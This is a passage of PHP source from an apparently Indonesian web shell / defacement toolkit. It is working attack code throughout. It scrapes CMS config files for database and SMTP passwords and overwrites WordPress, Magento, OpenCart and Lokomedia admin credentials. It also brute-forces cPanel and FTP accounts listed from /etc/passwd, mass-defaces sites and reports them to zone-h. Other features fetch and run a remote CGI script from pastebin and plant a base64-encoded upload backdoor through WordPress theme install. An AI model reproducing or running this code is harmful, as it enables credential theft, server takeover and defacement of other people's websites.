$dbhost = ambilkata($config,"DB_HOST', '","'"); | |
$dbuser = ambilkata($config,"DB_USER', '","'"); | |
$dbpass = ambilkata($config,"DB_PASSWORD', '","'"); | |
$dbname = ambilkata($config,"DB_NAME', '","'"); | |
$dbprefix = ambilkata($config,"table_prefix = '","'"); | |
$prefix = $dbprefix."users"; | |
$option = $dbprefix."options"; | |
$conn = mysql_connect($dbhost,$dbuser,$dbpass); | |
$db = mysql_select_db($dbname); | |
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); | |
$result = mysql_fetch_array($q); | |
$id = $result[ID]; | |
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); | |
$result2 = mysql_fetch_array($q2); | |
$target = $result2[option_value]; | |
if($target == '') { | |
$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; | |
} else { | |
$url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>"; | |
} | |
$update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); | |
echo "Config => ".$file_conf."<br>"; | |
echo "CMS => Wordpress<br>"; | |
echo $url_target; | |
if(!$update OR !$conn OR !$db) { | |
echo "Status => <font color=red>".mysql_error()."</font><br><br>"; | |
} else { | |
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"; | |
} | |
mysql_close($conn); | |
} elseif(preg_match("/Magento|Mage_Core/",$config)) { | |
$dbhost = ambilkata($config,"<host><![CDATA[","]]></host>"); | |
$dbuser = ambilkata($config,"<username><![CDATA[","]]></username>"); | |
$dbpass = ambilkata($config,"<password><![CDATA[","]]></password>"); | |
$dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>"); | |
$dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>"); | |
$prefix = $dbprefix."admin_user"; | |
$option = $dbprefix."core_config_data"; | |
$conn = mysql_connect($dbhost,$dbuser,$dbpass); | |
$db = mysql_select_db($dbname); | |
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); | |
$result = mysql_fetch_array($q); | |
$id = $result[user_id]; | |
$q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'"); | |
$result2 = mysql_fetch_array($q2); | |
$target = $result2[value]; | |
if($target == '') { | |
$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; | |
} else { | |
$url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>"; | |
} | |
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); | |
echo "Config => ".$file_conf."<br>"; | |
echo "CMS => Magento<br>"; | |
echo $url_target; | |
if(!$update OR !$conn OR !$db) { | |
echo "Status => <font color=red>".mysql_error()."</font><br><br>"; | |
} else { | |
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"; | |
} | |
mysql_close($conn); | |
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { | |
$dbhost = ambilkata($config,"'DB_HOSTNAME', '","'"); | |
$dbuser = ambilkata($config,"'DB_USERNAME', '","'"); | |
$dbpass = ambilkata($config,"'DB_PASSWORD', '","'"); | |
$dbname = ambilkata($config,"'DB_DATABASE', '","'"); | |
$dbprefix = ambilkata($config,"'DB_PREFIX', '","'"); | |
$prefix = $dbprefix."user"; | |
$conn = mysql_connect($dbhost,$dbuser,$dbpass); | |
$db = mysql_select_db($dbname); | |
$q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); | |
$result = mysql_fetch_array($q); | |
$id = $result[user_id]; | |
$target = ambilkata($config,"HTTP_SERVER', '","'"); | |
if($target == '') { | |
$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; | |
} else { | |
$url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>"; | |
} | |
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); | |
echo "Config => ".$file_conf."<br>"; | |
echo "CMS => OpenCart<br>"; | |
echo $url_target; | |
if(!$update OR !$conn OR !$db) { | |
echo "Status => <font color=red>".mysql_error()."</font><br><br>"; | |
} else { | |
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"; | |
} | |
mysql_close($conn); | |
} elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { | |
$dbhost = ambilkata($config,'server = "','"'); | |
$dbuser = ambilkata($config,'username = "','"'); | |
$dbpass = ambilkata($config,'password = "','"'); | |
$dbname = ambilkata($config,'database = "','"'); | |
$prefix = "users"; | |
$option = "identitas"; | |
$conn = mysql_connect($dbhost,$dbuser,$dbpass); | |
$db = mysql_select_db($dbname); | |
$q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); | |
$result = mysql_fetch_array($q); | |
$target = $result[alamat_website]; | |
if($target == '') { | |
$target2 = $result[url]; | |
$url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; | |
if($target2 == '') { | |
$url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>"; | |
} else { | |
$cek_login3 = file_get_contents("$target2/adminweb/"); | |
$cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); | |
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { | |
$url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>"; | |
} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { | |
$url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>"; | |
} else { | |
$url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>"; | |
} | |
} | |
} else { | |
$cek_login = file_get_contents("$target/adminweb/"); | |
$cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); | |
if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { | |
$url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>"; | |
} elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { | |
$url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>"; | |
} else { | |
$url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>"; | |
} | |
} | |
$update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); | |
echo "Config => ".$file_conf."<br>"; | |
echo "CMS => Lokomedia<br>"; | |
if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) { | |
echo $url_target2; | |
} else { | |
echo $url_target; | |
} | |
if(!$update OR !$conn OR !$db) { | |
echo "Status => <font color=red>".mysql_error()."</font><br><br>"; | |
} else { | |
echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>"; | |
} | |
mysql_close($conn); | |
} | |
} | |
} | |
} else { | |
echo "<center> | |
<h1>Auto Edit User Config</h1> | |
<form method='post'> | |
DIR Config: <br> | |
<input type='text' size='50' name='config_dir' value='$dir'><br><br> | |
Set User & Pass: <br> | |
<input type='text' name='user_baru' value='Xsol' placeholder='user_new'><br> | |
<input type='text' name='pass_baru' value='Xsol' placeholder='pass_new'><br> | |
<input type='submit' name='hajar' value='Hajar!' style='width: 215px;'> | |
</form> | |
<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br> | |
"; | |
} | |
} elseif($_GET['do'] == 'cpanel') { | |
if($_POST['crack']) { | |
$usercp = explode("\r\n", $_POST['user_cp']); | |
$passcp = explode("\r\n", $_POST['pass_cp']); | |
$i = 0; | |
foreach($usercp as $ucp) { | |
foreach($passcp as $pcp) { | |
if(@mysql_connect('localhost', $ucp, $pcp)) { | |
if($_SESSION[$ucp] && $_SESSION[$pcp]) { | |
} else { | |
$_SESSION[$ucp] = "1"; | |
$_SESSION[$pcp] = "1"; | |
if($ucp == '' || $pcp == '') { | |
} else { | |
$i++; | |
if(function_exists('posix_getpwuid')) { | |
$domain_cp = file_get_contents("/etc/named.conf"); | |
if($domain_cp == '') { | |
$dom = "<font color=red>gabisa ambil nama domain nya</font>"; | |
} else { | |
preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp); | |
foreach($domains_cp[1] as $dj) { | |
$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); | |
$user_cp_url = $user_cp_url['name']; | |
if($user_cp_url == $ucp) { | |
$dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>"; | |
break; | |
} | |
} | |
} | |
} else { | |
$dom = "<font color=red>function is Disable by system</font>"; | |
} | |
echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>"; | |
} | |
} | |
} | |
} | |
} | |
if($i == 0) { | |
} else { | |
echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>Xsol-Xsol.</font>"; | |
} | |
} else { | |
echo "<center> | |
<form method='post'> | |
USER: <br> | |
<textarea style='width: 450px; height: 150px;' name='user_cp'>"; | |
$_usercp = fopen("/etc/passwd","r"); | |
while($getu = fgets($_usercp)) { | |
if($getu == '' || !$_usercp) { | |
echo "<font color=red>Can't read /etc/passwd</font>"; | |
} else { | |
preg_match_all("/(.*?):x:/", $getu, $u); | |
foreach($u[1] as $user_cp) { | |
if(is_dir("/home/$user_cp/public_html")) { | |
echo "$user_cp\n"; | |
} | |
} | |
} | |
} | |
echo "</textarea><br> | |
PASS: <br> | |
<textarea style='width: 450px; height: 200px;' name='pass_cp'>"; | |
function cp_pass($dir) { | |
$pass = ""; | |
$dira = scandir($dir); | |
foreach($dira as $dirb) { | |
if(!is_file("$dir/$dirb")) continue; | |
$ambil = file_get_contents("$dir/$dirb"); | |
if(preg_match("/WordPress/", $ambil)) { | |
$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n"; | |
} elseif(preg_match("/JConfig|joomla/", $ambil)) { | |
$pass .= ambilkata($ambil,"password = '","'")."\n"; | |
} elseif(preg_match("/Magento|Mage_Core/", $ambil)) { | |
$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n"; | |
} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) { | |
$pass .= ambilkata($ambil,'password = "','"')."\n"; | |
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) { | |
$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n"; | |
} elseif(preg_match("/^[client]$/", $ambil)) { | |
preg_match("/password=(.*?)/", $ambil, $pass1); | |
if(preg_match('/"/', $pass1[1])) { | |
$pass1[1] = str_replace('"', "", $pass1[1]); | |
$pass .= $pass1[1]."\n"; | |
} else { | |
$pass .= $pass1[1]."\n"; | |
} | |
} elseif(preg_match("/cc_encryption_hash/", $ambil)) { | |
$pass .= ambilkata($ambil,"db_password = '","'")."\n"; | |
} | |
} | |
echo $pass; | |
} | |
$cp_pass = cp_pass($dir); | |
echo $cp_pass; | |
echo "</textarea><br> | |
<input type='submit' name='crack' style='width: 450px;' value='Crack'> | |
</form> | |
<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>"; | |
} | |
} elseif($_GET['do'] == 'cpftp_auto') { | |
if($_POST['crack']) { | |
$usercp = explode("\r\n", $_POST['user_cp']); | |
$passcp = explode("\r\n", $_POST['pass_cp']); | |
$i = 0; | |
foreach($usercp as $ucp) { | |
foreach($passcp as $pcp) { | |
if(@mysql_connect('localhost', $ucp, $pcp)) { | |
if($_SESSION[$ucp] && $_SESSION[$pcp]) { | |
} else { | |
$_SESSION[$ucp] = "1"; | |
$_SESSION[$pcp] = "1"; | |
if($ucp == '' || $pcp == '') { | |
// | |
} else { | |
echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>"; | |
$ftp_conn = ftp_connect($ip); | |
$ftp_login = ftp_login($ftp_conn, $ucp, $pcp); | |
if((!$ftp_login) || (!$ftp_conn)) { | |
echo "[+] <font color=red>Login Gagal</font><br><br>"; | |
} else { | |
echo "[+] <font color=lime>Login Sukses</font><br>"; | |
$fi = htmlspecialchars($_POST['file_deface']); | |
$deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY); | |
if($deface) { | |
$i++; | |
echo "[+] <font color=lime>Deface Sukses</font><br>"; | |
if(function_exists('posix_getpwuid')) { | |
$domain_cp = file_get_contents("/etc/named.conf"); | |
if($domain_cp == '') { | |
echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>"; | |
} else { | |
preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp); | |
foreach($domains_cp[1] as $dj) { | |
$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); | |
$user_cp_url = $user_cp_url['name']; | |
if($user_cp_url == $ucp) { | |
echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>"; | |
break; | |
} | |
} | |
} | |
} else { | |
echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>"; | |
} | |
} else { | |
echo "[-] <font color=red>Deface Gagal</font><br><br>"; | |
} | |
} | |
//echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>"; | |
} | |
} | |
} | |
} | |
} | |
if($i == 0) { | |
} else { | |
echo "<br>sukses deface ".$i." Cpanel by <font color=lime>Xsol-Xsol.</font>"; | |
} | |
} else { | |
echo "<center> | |
<form method='post'> | |
Filename: <br> | |
<input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br> | |
Deface Page: <br> | |
<input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br> | |
USER: <br> | |
<textarea style='width: 450px; height: 150px;' name='user_cp'>"; | |
$_usercp = fopen("/etc/passwd","r"); | |
while($getu = fgets($_usercp)) { | |
if($getu == '' || !$_usercp) { | |
echo "<font color=red>Can't read /etc/passwd</font>"; | |
} else { | |
preg_match_all("/(.*?):x:/", $getu, $u); | |
foreach($u[1] as $user_cp) { | |
if(is_dir("/home/$user_cp/public_html")) { | |
echo "$user_cp\n"; | |
} | |
} | |
} | |
} | |
echo "</textarea><br> | |
PASS: <br> | |
<textarea style='width: 450px; height: 200px;' name='pass_cp'>"; | |
function cp_pass($dir) { | |
$pass = ""; | |
$dira = scandir($dir); | |
foreach($dira as $dirb) { | |
if(!is_file("$dir/$dirb")) continue; | |
$ambil = file_get_contents("$dir/$dirb"); | |
if(preg_match("/WordPress/", $ambil)) { | |
$pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n"; | |
} elseif(preg_match("/JConfig|joomla/", $ambil)) { | |
$pass .= ambilkata($ambil,"password = '","'")."\n"; | |
} elseif(preg_match("/Magento|Mage_Core/", $ambil)) { | |
$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n"; | |
} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) { | |
$pass .= ambilkata($ambil,'password = "','"')."\n"; | |
} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) { | |
$pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n"; | |
} elseif(preg_match("/client/", $ambil)) { | |
preg_match("/password=(.*)/", $ambil, $pass1); | |
if(preg_match('/"/', $pass1[1])) { | |
$pass1[1] = str_replace('"', "", $pass1[1]); | |
$pass .= $pass1[1]."\n"; | |
} | |
} elseif(preg_match("/cc_encryption_hash/", $ambil)) { | |
$pass .= ambilkata($ambil,"db_password = '","'")."\n"; | |
} | |
} | |
echo $pass; | |
} | |
$cp_pass = cp_pass($dir); | |
echo $cp_pass; | |
echo "</textarea><br> | |
<input type='submit' name='crack' style='width: 450px;' value='Hajar'> | |
</form> | |
<span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>"; | |
} | |
} elseif($_GET['do'] == 'smtp') { | |
echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>"; | |
function scj($dir) { | |
$dira = scandir($dir); | |
foreach($dira as $dirb) { | |
if(!is_file("$dir/$dirb")) continue; | |
$ambil = file_get_contents("$dir/$dirb"); | |
$ambil = str_replace("$", "", $ambil); | |
if(preg_match("/JConfig|joomla/", $ambil)) { | |
$smtp_host = ambilkata($ambil,"smtphost = '","'"); | |
$smtp_auth = ambilkata($ambil,"smtpauth = '","'"); | |
$smtp_user = ambilkata($ambil,"smtpuser = '","'"); | |
$smtp_pass = ambilkata($ambil,"smtppass = '","'"); | |
$smtp_port = ambilkata($ambil,"smtpport = '","'"); | |
$smtp_secure = ambilkata($ambil,"smtpsecure = '","'"); | |
echo "SMTP Host: <font color=lime>$smtp_host</font><br>"; | |
echo "SMTP port: <font color=lime>$smtp_port</font><br>"; | |
echo "SMTP user: <font color=lime>$smtp_user</font><br>"; | |
echo "SMTP pass: <font color=lime>$smtp_pass</font><br>"; | |
echo "SMTP auth: <font color=lime>$smtp_auth</font><br>"; | |
echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>"; | |
} | |
} | |
} | |
$smpt_hunter = scj($dir); | |
echo $smpt_hunter; | |
} elseif($_GET['do'] == 'auto_wp') { | |
if($_POST['hajar']) { | |
$title = htmlspecialchars($_POST['new_title']); | |
$pn_title = str_replace(" ", "-", $title); | |
if($_POST['cek_edit'] == "Y") { | |
$script = $_POST['edit_content']; | |
} else { | |
$script = $title; | |
} | |
$conf = $_POST['config_dir']; | |
$scan_conf = scandir($conf); | |
foreach($scan_conf as $file_conf) { | |
if(!is_file("$conf/$file_conf")) continue; | |
$config = file_get_contents("$conf/$file_conf"); | |
if(preg_match("/WordPress/", $config)) { | |
$dbhost = ambilkata($config,"DB_HOST', '","'"); | |
$dbuser = ambilkata($config,"DB_USER', '","'"); | |
$dbpass = ambilkata($config,"DB_PASSWORD', '","'"); | |
$dbname = ambilkata($config,"DB_NAME', '","'"); | |
$dbprefix = ambilkata($config,"table_prefix = '","'"); | |
$prefix = $dbprefix."posts"; | |
$option = $dbprefix."options"; | |
$conn = mysql_connect($dbhost,$dbuser,$dbpass); | |
$db = mysql_select_db($dbname); | |
$q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC"); | |
$result = mysql_fetch_array($q); | |
$id = $result[ID]; | |
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); | |
$result2 = mysql_fetch_array($q2); | |
$target = $result2[option_value]; | |
$update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'"); | |
$update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'"); | |
echo "<div style='margin: 5px auto;'>"; | |
if($target == '') { | |
echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> "; | |
} else { | |
echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> "; | |
} | |
if(!$update OR !$conn OR !$db) { | |
echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>"; | |
} else { | |
echo "<font color=lime>sukses di ganti.</font><br>"; | |
} | |
echo "</div>"; | |
mysql_close($conn); | |
} | |
} | |
} else { | |
echo "<center> | |
<h1>Auto Edit Title+Content WordPress</h1> | |
<form method='post'> | |
DIR Config: <br> | |
<input type='text' size='50' name='config_dir' value='$dir'><br><br> | |
Set Title: <br> | |
<input type='text' name='new_title' value='Hacked by Black-TeamX' placeholder='New Title'><br><br> | |
Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br> | |
<span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br> | |
<textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br> | |
<input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br> | |
</form> | |
<span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br> | |
"; | |
} | |
} elseif($_GET['do'] == 'zoneh') { | |
if($_POST['submit']) { | |
$domain = explode("\r\n", $_POST['url']); | |
$nick = $_POST['nick']; | |
echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>"; | |
echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>"; | |
function zoneh($url,$nick) { | |
$ch = curl_init("http://www.zone-h.com/notify/single"); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); | |
curl_setopt($ch, CURLOPT_POST, true); | |
curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send"); | |
return curl_exec($ch); | |
curl_close($ch); | |
} | |
foreach($domain as $url) { | |
$zoneh = zoneh($url,$nick); | |
if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) { | |
echo "$url -> <font color=lime>OK</font><br>"; | |
} else { | |
echo "$url -> <font color=red>ERROR</font><br>"; | |
} | |
} | |
} else { | |
echo "<center><form method='post'> | |
<u>Defacer</u>: <br> | |
<input type='text' name='nick' size='50' value='Xsol'><br> | |
<u>Domains</u>: <br> | |
<textarea style='width: 450px; height: 150px;' name='url'></textarea><br> | |
<input type='submit' name='submit' value='Submit' style='width: 450px;'> | |
</form>"; | |
} | |
echo "</center>"; | |
} elseif($_GET['do'] == 'cgi') { | |
$cgi_dir = mkdir('idx_cgi', 0755); | |
$file_cgi = "idx_cgi/cgi.izo"; | |
$isi_htcgi = "AddHandler cgi-script .izo"; | |
$htcgi = fopen(".htaccess", "w"); | |
$cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg"); | |
$cgi = fopen($file_cgi, "w"); | |
fwrite($cgi, $cgi_script); | |
fwrite($htcgi, $isi_htcgi); | |
chmod($file_cgi, 0755); | |
echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>"; | |
} elseif($_GET['do'] == 'fake_root') { | |
ob_start(); | |
$cwd = getcwd(); | |
$ambil_user = explode("/", $cwd); | |
$user = $ambil_user[2]; | |
if($_POST['reverse']) { | |
$site = explode("\r\n", $_POST['url']); | |
$file = $_POST['file']; | |
foreach($site as $url) { | |
$cek = getsource("$url/~$user/$file"); | |
if(preg_match("/hacked/i", $cek)) { | |
echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>"; | |
} | |
} | |
} else { | |
echo "<center><form method='post'> | |
Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br> | |
User: <br><input type='text' value='$user' size='50' height='10' readonly><br> | |
Domain: <br> | |
<textarea style='width: 450px; height: 250px;' name='url'>"; | |
reverse($_SERVER['HTTP_HOST']); | |
echo "</textarea><br> | |
<input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'> | |
</form><br> | |
NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>"; | |
} | |
} elseif($_GET['do'] == 'adminer') { | |
$full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir); | |
function adminer($url, $isi) { | |
$fp = fopen($isi, "w"); | |
$ch = curl_init(); | |
curl_setopt($ch, CURLOPT_URL, $url); | |
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); | |
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); | |
curl_setopt($ch, CURLOPT_FILE, $fp); | |
return curl_exec($ch); | |
curl_close($ch); | |
fclose($fp); | |
ob_flush(); | |
flush(); | |
} | |
if(file_exists('adminer.php')) { | |
echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>"; | |
} else { | |
if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) { | |
echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>"; | |
} else { | |
echo "<center><font color=red>gagal buat file adminer</font></center>"; | |
} | |
} | |
} elseif($_GET['do'] == 'auto_dwp') { | |
if($_POST['auto_deface_wp']) { | |
function anucurl($sites) { | |
$ch = curl_init($sites); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); | |
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); | |
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); | |
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); | |
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); | |
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); | |
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); | |
curl_setopt($ch, CURLOPT_COOKIESESSION, true); | |
$data = curl_exec($ch); | |
curl_close($ch); | |
return $data; | |
} | |
function lohgin($cek, $web, $userr, $pass, $wp_submit) { | |
$post = array( | |
"log" => "$userr", | |
"pwd" => "$pass", | |
"rememberme" => "forever", | |
"wp-submit" => "$wp_submit", | |
"redirect_to" => "$web", | |
"testcookie" => "1", | |
); | |
$ch = curl_init($cek); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); | |
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); | |
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0"); | |
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); | |
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); | |
curl_setopt($ch, CURLOPT_POST, 1); | |
curl_setopt($ch, CURLOPT_POSTFIELDS, $post); | |
curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt'); | |
curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt'); | |
curl_setopt($ch, CURLOPT_COOKIESESSION, true); | |
$data = curl_exec($ch); | |
curl_close($ch); | |
return $data; | |
} | |
$scan = $_POST['link_config']; | |
$link_config = scandir($scan); | |
$script = htmlspecialchars($_POST['script']); | |
$user = "Xsol"; | |
$pass = "Xsol"; | |
$passx = md5($pass); | |
foreach($link_config as $dir_config) { | |
if(!is_file("$scan/$dir_config")) continue; | |
$config = file_get_contents("$scan/$dir_config"); | |
if(preg_match("/WordPress/", $config)) { | |
$dbhost = ambilkata($config,"DB_HOST', '","'"); | |
$dbuser = ambilkata($config,"DB_USER', '","'"); | |
$dbpass = ambilkata($config,"DB_PASSWORD', '","'"); | |
$dbname = ambilkata($config,"DB_NAME', '","'"); | |
$dbprefix = ambilkata($config,"table_prefix = '","'"); | |
$prefix = $dbprefix."users"; | |
$option = $dbprefix."options"; | |
$conn = mysql_connect($dbhost,$dbuser,$dbpass); | |
$db = mysql_select_db($dbname); | |
$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); | |
$result = mysql_fetch_array($q); | |
$id = $result[ID]; | |
$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); | |
$result2 = mysql_fetch_array($q2); | |
$target = $result2[option_value]; | |
if($target == '') { | |
echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>"; | |
} else { | |
echo "[+] $target <br>"; | |
} | |
$update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'"); | |
if(!$conn OR !$db OR !$update) { | |
echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>"; | |
mysql_close($conn); | |
} else { | |
$site = "$target/wp-login.php"; | |
$site2 = "$target/wp-admin/theme-install.php?upload"; | |
$b1 = anucurl($site2); | |
$wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />"); | |
$b = lohgin($site, $site2, $user, $pass, $wp_sub); | |
$anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />"); | |
$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg=="); | |
$www = "m.php"; | |
$fp5 = fopen($www,"w"); | |
fputs($fp5,$upload3); | |
$post2 = array( | |
"_wpnonce" => "$anu2", | |
"_wp_http_referer" => "/wp-admin/theme-install.php?upload", | |
"themezip" => "@$www", | |
"install-theme-submit" => "Install Now", | |
); | |
